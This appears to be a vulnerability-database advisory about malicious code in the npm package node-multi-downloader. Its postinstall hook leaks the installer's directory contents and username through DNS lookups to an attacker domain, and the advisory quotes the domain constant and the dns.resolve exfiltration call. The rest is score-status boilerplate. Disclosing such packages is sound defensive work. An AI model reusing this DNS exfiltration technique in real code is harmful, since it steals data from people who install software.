Vulnerability
Malicious code in node-multi-downloader (npm)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68) On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`) and index.js line 8 calls `dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A',...)` to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time.
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / EXPLOIT signals and the EPSS percentile (lower panel). Re-check this CVE after one cron tick — the score lands automatically when the source publishes.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence